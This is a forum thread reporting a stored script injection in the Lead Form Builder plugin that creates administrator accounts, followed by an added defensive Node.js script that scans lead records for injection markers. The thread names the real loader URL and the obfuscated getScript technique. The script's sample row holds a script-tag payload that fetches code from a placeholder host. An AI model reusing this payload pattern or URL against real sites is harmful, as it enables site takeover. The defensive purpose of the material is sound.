
WARNING JQuery script injection - PLEASE FIX ASAP

teox99

Pro Member
Pro
#1
You can inject dangerous script in form text data; you must prevent users from inserting scripting tags!!!!
I found this in an email saved in the database (check the attached file). When you click on "view leads" the script can create a new user with administration level!!!
The script uses jQuery.getScript(String.fromCharCode(...) to call an external URL https://2b5.pw/i.js
PLEASE FIX IT AS SOON AS POSSIBLE!!!
 


deva

Pro Member
Pro
#2
Lead Form Builder Pro (and the free version, Lead Form Builder) was updated from version 1.7.6 to 1.7.7 circa 14 April 2022, about 10 days after your post.
Not sure of the version change content / benefit, so not sure if the injection threat has been resolved.
Suggest you test and evaluate the latest 1.7.7 version.
 

deva

Pro Member
Pro
#3
Lead Form Builder Pro updated again to v 1.7.8 on 25 April 2022.
No mention of JQuery script injection:

Version 1.7.8
  • Unlimited block for Gutenberg plugin added.
  • Elementor issue fixed.
Version 1.7.7
  • Widget error fixed.
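
The injection reported in post #1, seen from the cleanup side, as an added example that is not part of the thread or the plugin's own code: a Node.js script that scans exported lead records for the markers named in the report, decodes String.fromCharCode arguments for review without executing them, and HTML-encodes the stored value for safe display. The record layout, field names and sample rows (including the example.invalid URL) are constructed assumptions.

```javascript
// Markers named in the report: script tags, jQuery.getScript, String.fromCharCode.
// The inline event-handler pattern is an extra check added for this example.
const MARKERS = [
  { name: 'script-tag', re: /<\s*script\b/i },
  { name: 'event-handler', re: /<[^>]+\son\w+\s*=/i },
  { name: 'getScript', re: /\bgetScript\s*\(/i },
  { name: 'fromCharCode', re: /String\s*\.\s*fromCharCode\s*\(/i },
];

// Decode String.fromCharCode(n, n, ...) calls so a reviewer can read the hidden
// string (typically a URL) as plain text. Nothing from the record is executed.
function decodeCharCodes(text) {
  const out = [];
  const re = /String\s*\.\s*fromCharCode\s*\(([\d\s,]+)\)/gi;
  for (const m of text.matchAll(re)) {
    const codes = m[1].split(',').map(s => parseInt(s.trim(), 10)).filter(Number.isFinite);
    out.push(String.fromCharCode(...codes));
  }
  return out;
}

// Encode a stored value before it is written into an HTML admin page.
function escapeHtml(value) {
  const map = { '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' };
  return String(value).replace(/[&<>"']/g, c => map[c]);
}

// Return one finding per suspicious field: which markers hit, what the
// char-code sequences decode to, and a display-safe copy of the value.
function auditLeads(leads) {
  const findings = [];
  for (const lead of leads) {
    for (const [field, value] of Object.entries(lead.fields)) {
      const hits = MARKERS.filter(m => m.re.test(value)).map(m => m.name);
      if (hits.length) {
        findings.push({ id: lead.id, field, hits, decoded: decodeCharCodes(value), safe: escapeHtml(value) });
      }
    }
  }
  return findings;
}

// Constructed sample rows (hypothetical export format, placeholder URL).
const encoded = Array.from('https://example.invalid/i.js', c => c.charCodeAt(0)).join(',');
const SAMPLE_LEADS = [
  { id: 1, fields: { name: 'Ann', email: 'ann@example.com', message: 'Please call me back <3' } },
  { id: 2, fields: { name: 'x', email: `<script>jQuery.getScript(String.fromCharCode(${encoded}))</script>`, message: 'hi' } },
];

console.log(JSON.stringify(auditLeads(SAMPLE_LEADS), null, 2));
```

A hit in the audit means the row should be reviewed and removed from the database, and the site's administrator accounts checked for users nobody created.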